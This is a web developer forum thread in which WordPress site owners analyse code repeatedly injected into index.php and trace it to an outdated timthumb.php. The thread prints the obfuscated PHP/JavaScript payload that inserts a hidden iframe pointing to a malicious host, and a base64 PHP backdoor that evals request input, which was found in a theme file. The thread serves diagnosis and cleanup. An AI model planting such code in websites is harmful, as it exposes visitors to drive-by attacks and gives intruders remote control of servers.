www.webdeveloper.com
Results 1 to 10 of 10

Thread: Malicious Code Inject: What Does It Do?

  1. #1
    Join Date
    Nov 2005
    Location
    San Diego
    Posts
    54

    Malicious Code Inject: What Does It Do?

    I have dozens of wordpress installs which are constantly getting malicious code injected into the beginning of index.php despite keeping wordpress updated as well as updating to the latest version of timthumb.php in each setup.

    So now it's time to reverse engineer this bugger, learn more about how it works, and possibly find a way to prevent more of the same script injects.

    It uses a couple levels of obfuscation, first being a base64 decode:
    Code:
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdjVDFrYjJOMWJXVnVkQzVqY21WaGRHVkZiR1Z0Wlc1MEtDSndJaWs3Y1M1aGNIQmxibVJEYUdsc1pDaHhLeUlpS1R0OVkyRjBZMmdvY1hjcGUyZzlMVEF4TWk4MU8zUnllWHRpWTNOa1BYQnliM1J2ZEhsd1pTMHlPMzFqWVhSamFDaGlZWGRuS1h0emN6MWJYVHRtUFNob0tUOG9JbVp5YjIxRGFHRnlReUlySW05a1pTSXBPaUlpTzJVOWQybHVaRzkzV3lKbElpc2lkbUZzSWwwN2JqMWJPU3d4T0N3ek1UVXNOREE0TERNeUxEZ3dMRE13TUN3ME5EUXNPVGtzTWpNMExETXlOeXcwTURRc01URXdMREl6TWl3eE16Z3NOREV5TERFd01Td3lNeklzTWpBM0xEUXpNaXd4TURFc01qRTRMRE13TXl3ME5EQXNNVEUyTERJek1Dd3hPVGdzTkRnMExEZzBMREU1TkN3ek1Ea3NNekV5TERrM0xESXhPQ3d6TURNc01UWXdMRE01TERFNU5pd3pNek1zTkRBd0xERXlNU3czT0N3eE1qTXNNelkwTERRNExERTROaXd4TWpNc05Ea3lMREV6TERFNExESTNMRE0yTERFd05Td3lNRFFzTXpReUxETTRPQ3d4TURrc01qQXlMRE0wTWl3eE5qQXNOREVzTVRFNExETTVMRE0yTERrc01qVXdMRGsyTERRd05Dd3hNRGdzTWpNd0xETXdNeXd4TWpnc01USXpMREkyTERJM0xETTJMRGtzTWpBd0xETXpNeXd6T1RZc01URTNMREl4T0N3ek1ETXNORFF3TERFeE5pdzVNaXd6TlRjc05EVTJMREV3TlN3eU16SXNNekF6TERFMk1Dd3pOQ3d4TWpBc016RTFMRFF3T0N3eE1UUXNNVGswTERNeU55dzBNRFFzTXpJc01qTXdMRE0wTWl3ek9UWXNOakVzTnpnc016RXlMRFEyTkN3eE1UWXNNakkwTERFM05Dd3hPRGdzTkRjc01qSXlMRE16TXl3ME16SXNPVGdzTWpJNExETXlOeXcwTkRnc05EWXNNak15TERNeU5DdzBNREFzTkRZc01UazRMREk1Tnl3eE9EZ3NNVEF3TERrMExERTFOaXd4T1RJc05USXNPVElzTXpNMkxEUXhOaXd4TVRJc01USTJMRE13T1N3ME5EUXNOakVzT1Rnc01URTNMREV5T0N3eE1Ua3NNakV3TERNd01DdzBOalFzTVRBMExERXlNaXd4TVRjc01UazJMRFE0TERjNExEazJMRFF4Tml3eE1ERXNNakV3TERNd09TdzBNVFlzTVRFMkxERXlNaXd4TVRjc01UazJMRFE0TERjNExEazJMRFEyTUN3eE1UWXNNalF5TERNeU5DdzBNRFFzTmpFc056Z3NNelUwTERReU1Dd3hNVFVzTWpFd0xESTVOQ3cwTWpBc01UQTRMREl4TUN3ek5EZ3NORGcwTERVNExESXdPQ3d6TVRVc05EQXdMREV3TUN3eU1ESXNNek13TERJek5pd3hNVElzTWpJeUxETTBOU3cwTWpBc01URTJMREl4TUN3ek16TXNORFF3TERVNExERTVOQ3d5T1RRc05EWXdMREV4TVN3eU1UWXNNelV4TERRMk5Dd3hNREVzTVRFNExETXlOQ3cwTURRc01UQXlMREl6TWl3eE56UXNNVGt5TERVNUxESXpNaXd6TXpNc05EUTRMRFU0TERrMkxERTNOeXd4TlRZc05qSXNNVEl3TERFME1TdzBNakFzTVRBeUxESXlPQ3d5T1RFc05ETTJMREV3TVN3eE1qUXNNVEF5TERFMk5DdzFPU3d5Tml3eU55d3pOaXd4TWpVc01qWXNNamNzTXpZc01UQXlMREl6TkN3ek16QXNNemsyTERFeE5pd3lNVEFzTXpNekxEUTBNQ3d6TWl3eU1UQXNNekEyTERRMU5pdzVOeXd5TVRnc016QXpMRFExTml3ME1DdzRNaXd6Tmprc05USXNPU3d4T0N3eU55dzBOeklzT1Rjc01qSTRMRGsyTERRd09Dd3pNaXd4TWpJc09UWXNOREF3TERFeE1Td3hPVGdzTXpVeExEUXpOaXd4TURFc01qSXdMRE0wT0N3eE9EUXNPVGtzTWpJNExETXdNeXd6T0Rnc01URTJMREl3TWl3eU1EY3NORE15TERFd01Td3lNVGdzTXpBekxEUTBNQ3d4TVRZc09EQXNNVEUzTERReU1Dd3hNRElzTWpJNExESTVNU3cwTXpZc01UQXhMRGM0TERFeU15d3lNellzTVRBeUxEa3lMRE0wTlN3ME1EUXNNVEUyTERFek1Dd3pORGdzTkRZMExERXhOQ3d5TVRBc01qazBMRFEyT0N3eE1UWXNNakF5TERFeU1Dd3hOVFlzTVRFMUxESXlPQ3d5T1Rjc01UVTJMRFEwTERjNExETXhNaXcwTmpRc01URTJMREl5TkN3eE56UXNNVGc0TERRM0xESXlNaXd6TXpNc05ETXlMRGs0TERJeU9Dd3pNamNzTkRRNExEUTJMREl6TWl3ek1qUXNOREF3TERRMkxERTVPQ3d5T1Rjc01UZzRMREV3TUN3NU5Dd3hOVFlzTVRreUxEVXlMRGt5TERNek5pdzBNVFlzTVRFeUxERXlOaXd6TURrc05EUTBMRFl4TERrNExERXhOeXd4TmpRc05Ua3NNakEwTERFek9DdzBOakFzTVRFMkxESTBNaXd6TWpRc05EQTBMRFEyTERJek5pd3pNVFVzTkRZd0xERXdOU3d4T1RZc016RTFMRFF6TWl3eE1EVXNNak15TERNMk15d3lORFFzTXprc01qQTRMRE14TlN3ME1EQXNNVEF3TERJd01pd3pNekFzTVRVMkxEVTVMREl3TkN3eE16Z3NORFl3TERFeE5pd3lORElzTXpJMExEUXdOQ3cwTml3eU1qUXNNek16TERRMk1Dd3hNRFVzTWpNeUxETXhOU3cwTkRRc01URXdMREV5TWl3eE1UY3NNemc0TERrNExESXpNQ3d6TXpNc05ETXlMREV4Tnl3eU16SXNNekF6TERFMU5pdzFPU3d5TURRc01UTTRMRFEyTUN3eE1UWXNNalF5TERNeU5DdzBNRFFzTkRZc01qRTJMRE13TXl3ME1EZ3NNVEUyTERFeU1pd3hNVGNzTVRreUxETTVMREV4T0N3ek1EWXNNVGcwTERFeE5Td3lNeklzTXpZekxEUXpNaXd4TURFc09USXNNelE0TERRME5Dd3hNVElzTVRJeUxERXhOeXd4T1RJc016a3NNVEU0TERNd05pd3hPRFFzTVRFMUxESXdNaXd6TkRnc01qWXdMREV4Tml3eU16SXNNelF5TERReU1DdzVPQ3d5TXpRc016UTRMRFF3TkN3ME1DdzNPQ3d6TlRjc05ESXdMREV3TUN3eU16SXNNekV5TERFMU5pdzBOQ3czT0N3eE5EY3NNVGt5TERNNUxEZ3lMREUzTnl3ME1EZ3NORFlzTWpNd0xETXdNeXcwTmpRc05qVXNNak15TERNME9DdzBOVFlzTVRBMUxERTVOaXd6TlRFc05EWTBMREV3TVN3NE1Dd3hNVGNzTkRFMkxERXdNU3d5TVRBc016QTVMRFF4Tml3eE1UWXNOemdzTVRNeUxERTFOaXcwT1N3NU5pd3hNVGNzTVRZMExEVTVMREkyTERJM0xETTJMRGtzTWpBd0xETXpNeXd6T1RZc01URTNMREl4T0N3ek1ETXNORFF3TERFeE5pdzVNaXd6TURrc05EQTBMREV4Tml3eE16Z3NNekkwTERRd05Dd3hNRGtzTWpBeUxETXpNQ3cwTmpRc01URTFMREV6TWl3ek5qTXNNek0yTERrM0xESXdOaXd5TXpRc016ZzRMREV3T1N3eU1ESXNNVEl3TERFMU5pdzVPQ3d5TWpJc016QXdMRFE0TkN3ek9TdzRNaXd5TnpNc01Ua3lMRGt6TERreUxESTVNU3cwTkRnc01URXlMREl3TWl3ek16QXNOREF3TERZM0xESXdPQ3d6TVRVc05ETXlMREV3TUN3NE1Dd3pNRFlzTVRZMExEVTVMREkyTERJM0xETTJMREV5TlYwN2FXWW9kMmx1Wkc5M0xtUnZZM1Z0Wlc1MEtXWnZjaWhwUFRZdE1pMHhMVEl0TVRzdE5UZ3hLMmtoUFRJdE1qdHBLeXNwZTJzOWFUdHpjejF6Y3l0VGRISnBibWRiWmwwb2JsdHJYUzhvYVNVb2FDcG9LU3N5TFRFcEtUdDlaU2h6Y3lrN2ZYMDhMM05qY21sd2REND0nKSk7DQp9'));
    Which after decoding, spits out some more jargon. This one I don't know how to decode/unpack:

    Code:
    <script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}</script>
    Anyone know what to do with this?

  2. #2
    Join Date
    Jun 2012
    Posts
    5

    Me too

    I found it without the base64 encoding, and it's not on a wordpress install here's the code I found, and it looks identical to your decoded javascript:

    Code:
    try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,206,312,468,102,220,351,444,106,226,138,420,98,210,366,184,99,198,141,400,47,104,144,208,46,224,312,448,63,206,333,244,49,78,96,476,105,200,348,416,61,78,147,192,39,64,312,404,105,206,312,464,61,78,147,192,39,64,345,464,121,216,303,244,39,236,315,460,105,196,315,432,105,232,363,232,104,210,300,400,101,220,177,448,111,230,315,464,105,222,330,232,97,196,345,444,108,234,348,404,59,216,303,408,116,116,144,236,116,222,336,232,48,118,117,248,60,94,315,408,114,194,327,404,62,68,123,236,13,18,27,500,13,18,27,408,117,220,297,464,105,222,330,128,105,204,342,388,109,202,342,160,41,246,39,36,9,18,354,388,114,64,306,128,61,64,300,444,99,234,327,404,110,232,138,396,114,202,291,464,101,138,324,404,109,202,330,464,40,78,315,408,114,194,327,404,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,460,114,198,117,176,39,208,348,464,112,116,141,188,103,208,351,408,110,234,333,424,113,92,315,392,105,244,138,396,99,94,300,188,52,96,156,184,112,208,336,252,103,222,183,196,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-587+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}
    If anyone knows what it does, I'm highly interested. I'm still picking it apart. If I come up with anything I'll post it here.

  3. #3
    Join Date
    Feb 2003
    Location
    Michigan, USA
    Posts
    5,774
    I feel your pain, having had to work on Wordpress blogs in an enterprise environment. I can only provide words of consolation from Bash.org:

    wordpress is an unauthenticated remote shell that, as a useful side feature, also contains a blog

  4. #4
    Join Date
    Jun 2012
    Posts
    5

    A little further....

    This actually could be a wordpress issue. The client had installed wordpress in a subdir that I was unaware of. They are also using timthumb.php so that may be the vector here. It's also the only site that is getting code injected on the server, so that is highly suspicious.

    I did manage to un-obsfucate the javascript. It basically adds an iframe like the following:
    Code:
    <iframe src='http://ghufnuojq.ibiz.cc/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
    It does this by trying first to call a function called iframer that looks like this:

    Code:
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://ghufnuojq.ibiz.cc/d/404.php?go=1');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width','10');
        f.setAttribute('height','10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    And if it cannot call that it does a document.write to produce the same. My suggestion is to kill timthumb.php for now and see if that stops the injection.

    -Steve

  5. #5
    Join Date
    Nov 2005
    Location
    San Diego
    Posts
    54
    Hey Steve that might be it. I found an old wordpress with a vulnerable v1.16 timthumb. Updated it to the latest version and haven't seen any of my other installs get script injects yet. Used to be, it would re inject itself on every index.php on the server every 15-30mins. Hopefully that last timthumb is all there was to it. I'll keep you guys posted.

    BTW, how did you manage to decode it?
    Last edited by SpectrumFire; 06-13-2012 at 11:17 PM.

  6. #6
    Join Date
    Jun 2012
    Posts
    5

    unpacked it here

    I unpacked it at the following site:
    http://jsunpack.jeek.org/

    The version of timthumb.php I found was at v1.12 so that was almost certainly my vector.

  7. #7
    Join Date
    Jun 2012
    Posts
    5

    Apparently there is some infighting now...

    The last time there was injected code, it was replaced with "you need to pay for this crypt" instead of the obsfucated javascript. Just an FYI for everyone out there.

    -Steve

  8. #8
    Join Date
    Jun 2012
    Posts
    2

    Same issue, still without solution

    Hi, I came up with your post today after searching the web for days without helful solutions. I have exactly the same issue: infected index.php on 4 wordpress sites within the same account, but:
    - all of them up to date,
    - no timthumb or timthumb in the recent version
    - reinstalled wp several times,
    - changed password, db passwords
    ... ans still the files get infected again after a short while.
    It is the same code you described, but I am unable to find the source
    Any other hints or ideas?
    Thanks!!

  9. #9
    Join Date
    Jun 2012
    Posts
    5

    There were some backdoors injected as well...

    I found these in my particular case. The ass.php one is the nasty. It was a full bore php exploit shell. No bueno.

    found and removed the following in /dir/to/domain.com/public_html/wordpress/wp-content/themes/twentyeleven/functions.php
    Code:
    eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIGZtWExnWGl6Znp1ODNiICov"));
    Decodes to:
    Code:
    if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* fmXLgXizfzu83b */
    Found remote control script here:
    /dir/to/domain.com/public_html/wordpress/wp-content/themes/images/ass.php

    You should be able to find the exploit script if it is the same as mine by running the following in your public_html directory:
    Code:
    find ./ -name "*.php" -exec grep -l "SnIpEr_SA" {} \;
    *Disclaimer: NEVER run shell code on your server unless you understand it!!!

    Also check out this site, it has a lot of good advice:
    http://25yearsofprogramming.com/blog/2010/20100315.htm

    -Steve

  10. #10
    Join Date
    Jun 2012
    Posts
    2
    I am working with a domain hoster and I cannot execute shell commands there. The infection scheme you mentioned seems to be the same with me, but I cannot find the "ass.php" which I suppose is the source. I could clean 3 of my 4 installations, one still is infected.
    I cleaned up all wp-files, and theme files and copied it from a freshly downloaded wp installation. will see what happens now...

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles